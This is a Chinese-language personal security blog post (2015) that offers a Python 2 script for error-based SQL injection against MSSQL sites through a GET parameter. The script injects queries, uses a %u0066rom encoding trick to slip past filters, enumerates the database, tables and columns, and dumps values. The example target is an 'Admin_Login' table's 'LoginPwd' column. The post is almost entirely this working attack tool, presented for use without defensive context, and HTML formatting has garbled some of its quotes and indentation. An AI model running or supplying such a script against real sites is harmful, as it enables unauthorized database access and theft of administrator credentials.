<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  




<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="python," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。
对于get型的mssql的报错注入,代码如下：[python]
#! /usr/bin/env python
#coding=utf-8import reimport urllibimport urllib2
#从访问链接中获取报错信">
<meta property="og:type" content="article">
<meta property="og:title" content="基于mssql的报错注入的脚本(get)">
<meta property="og:url" content="http://yoursite.com/2015/04/07/基于mssql的报错注入的脚本(get)/index.html">
<meta property="og:site_name" content="wps2015的博客">
<meta property="og:description" content="在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。
对于get型的mssql的报错注入,代码如下：[python]
#! /usr/bin/env python
#coding=utf-8import reimport urllibimport urllib2
#从访问链接中获取报错信">
<meta property="og:updated_time" content="2016-04-13T01:36:32.902Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="基于mssql的报错注入的脚本(get)">
<meta name="twitter:description" content="在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。
对于get型的mssql的报错注入,代码如下：[python]
#! /usr/bin/env python
#coding=utf-8import reimport urllibimport urllib2
#从访问链接中获取报错信">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 基于mssql的报错注入的脚本(get) | wps2015的博客 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">wps2015的博客</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-tags fa-fw"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-heartbeat fa-fw"></i> <br />
            
            公益404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                基于mssql的报错注入的脚本(get)
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2015-04-07T21:02:13+08:00" content="2015-04-07">
              2015-04-07
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Python/" itemprop="url" rel="index">
                    <span itemprop="name">Python</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。</p>
<p>对于get型的mssql的报错注入,代码如下：<br>[python]</p>
<p>#! /usr/bin/<br>env python</p>
<p>#coding=utf-8<br>import re<br>import urllib<br>import urllib2</p>
<p>#从访问链接中获取报错信息</p>
<p>def getcontent(payload):  #获取网页内容<br>    url1=url+”AND (“+payload+”)=1 — “<br>    content = urllib.urlopen(url1).read()<br>    print content<br>    return  content</p>
<p>#从报错回显中提取数值<br>def getdata(content):<br>    patt = re.compile(“nvarchar.<em>?’(.</em>?)’.*?int”)<br>    data = patt.findall(content)<br>    if data:<br>        return data[0]<br>    else:<br>        return None</p>
<p>#获取当前数据库名<br>def getcurrentdb():<br>    payload = ‘db_name()’<br>    content = getcontent(payload)<br>    data = getdata(content)<br>    print “current_db: “+data<br>    return data<br>def gettablename(dbname,n):  #获取表名<br>    tablelist1=[]<br>    for i in range(n):<br>        payload = “select top 1 name %u0066rom “+dbname+”.dbo.sysobjects where xtype=’U’ and name  not in(select top “+str(i)+” name %u0066rom “+dbname+”.dbo.sysobjects where xtype=’U’ order by name) order by name”<br>        try:<br>            content = getcontent(payload)<br>            data = getdata(content)</p>
<pre><code>        #print data
        if data not in tablelist1:
            tablelist1.append(data)
        else:
            break
    except:
        continue
print tablelist1
print &apos;--------------------&apos;
</code></pre><p>def getcolumns(dbname,table,n):  #获取列名<br>    tablelist2=[]<br>    for i in range(n):<br>        payload=”Select top 1 name %u0066rom “+dbname+”.dbo.SysColumns Where id=Object_Id(‘“+table+”‘) and name not in (Select top “+str(i)+” Name %u0066rom “+dbname+”.dbo.SysColumns Where id=Object_Id(‘“+table+”‘) order by name) order by name”<br>        try:<br>            content = getcontent(payload)<br>            data = getdata(content)<br>            if  data not in tablelist2:<br>                tablelist2.append(data)<br>            else:<br>                break<br>        except:<br>            continue<br>    print table<br>    print tablelist2<br>    print ‘——————–’<br>def getvalue(dbname,table,column,n):  #获取各字段的值<br>    tablelist3=[]<br>    for i in range(n):<br>        payload=”select top 1 “+column+” %u0066rom “+table+” where “+column+” not in(select top  “+str(i)+” “+column+” %u0066rom “+table+” order by  id)order by id”<br>        try:<br>            content = getcontent(payload)<br>            data = getdata(content)<br>            if  data  not in tablelist3:<br>                tablelist3.append(data)<br>            else:<br>                break<br>        except:<br>            continue<br>    print column<br>    print tablelist3</p>
<p>if <strong>name</strong> == “<strong>main</strong>“:<br>    url=”<a href="http://www.example/pages/BulletinPage.aspx?id=21" target="_blank" rel="external">http://www.example/pages/BulletinPage.aspx?id=21</a>“<br>    global url<br>    db=getcurrentdb()<br>    gettablename(‘saa’,200)<br>    getcolumns(db,’Admin_Login’,50)<br>    getvalue(db,’Admin_Login’,’LoginPwd’,50)   #可自行选择注释，只留你需要的那个函数进行值得获取<br>[/python]</p>

      
    </div>
    
    <div>
      
        
      
    </div>

    <div>
      
        
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/python/" rel="tag">#python</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2015/04/06/HTTP请求头信息的注入/" rel="next" title="HTTP请求头信息的注入">
                <i class="fa fa-chevron-left"></i> HTTP请求头信息的注入
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2015/05/21/PHP5.5使用Bcrypt加密密码/" rel="prev" title="PHP5.5使用Bcrypt加密密码">
                PHP5.5使用Bcrypt加密密码 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/default_avatar.jpg"
               alt="wps2015" />
          <p class="site-author-name" itemprop="name">wps2015</p>
          <p class="site-description motion-element" itemprop="description">关注安全</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">12</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <p class="post-toc-empty">此文章未包含目录</p>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wps2015</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  



  
  
  

  

  

</body>
</html>
